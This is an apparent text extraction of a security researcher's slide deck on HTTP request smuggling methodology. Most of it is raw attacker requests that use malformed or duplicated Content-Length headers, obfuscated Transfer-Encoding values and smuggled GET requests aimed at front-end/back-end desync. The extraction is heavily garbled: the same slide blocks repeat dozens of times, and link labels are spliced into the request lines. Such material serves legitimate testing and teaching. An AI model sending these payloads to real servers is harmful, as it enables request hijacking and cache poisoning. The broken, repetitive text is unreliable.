HTTP Request Smuggling
HTTP Request Smuggling
Smuggling
Mahmoud M. Awali
@0xAwali
My Methodology
attacker
● Blog
POST / HTTP/1.1
● Blog Host: www.company.com
Content-Length: Number
● Slides
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology
attacker
● Blog
POST / HTTP/1.1
Host: www.company.com
Content-Length : Number
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
X:
My Methodology
attacker
● Slides
POST / HTTP/1.1
Host: www.company.com
Content-Length abce: Number
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
X:
My Methodology
attacker
● Slides
POST / HTTP/1.1
Host: www.company.com
\rContent-Length: Number
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
X:
My Methodology
attacker
● Slides
POST / HTTP/1.1
Host: www.company.com
Content\rLength: Number
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
X:
My Methodology
attacker
● Slides
POST / HTTP/1.1
Host: www.company.com
Content\x20Length: Number
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
X:
My Methodology
attacker
● Slides
POST / HTTP/1.1
Host: www.company.com
Content-Length: Number Number
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
X:
My Methodology
attacker
Try To Use HTTP Request Smuggling Connections Header Trick , Frontend Drop
Content-Length Header So Backend May Be See TWO Requests
Backend\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
● Video
POST / HTTP/1.1
● Blog Host: www.company.com
Content-Length: Number
● Blog Content-Length: Number
Backend\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
● Slides
POST / HTTP/1.1
Host: www.company.com
Content-Length: Number
Content-Length abcd: Number
Backend\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
● Slides
POST / HTTP/1.1
Host: www.company.com
Content-Length: Number
Content-Length abcd: Number
Backend\r\n
GET / HTTP/1.2\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
attacker
● Blog Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
attacker
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
● Video
POST / HTTP/1.1
Host: www.company.com
● Resource Content-Length: Number
Transfer-Encoding: xchunked
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
● Video
POST / HTTP/1.1
Host: www.company.com
● Blog Content-Length: Number
Transfer-Encoding: chunked
0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
● Video
POST / HTTP/1.1
Host: www.company.com
● Video Content-Length: Number
X: X\nTransfer-Encoding: chunked
● Writeup
0\r\n
\r\n
GET / HTTP/1.1
X: X
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology
attacker
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology
attacker
Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
Thank
You
Mahmoud M. Awali
@0xAwali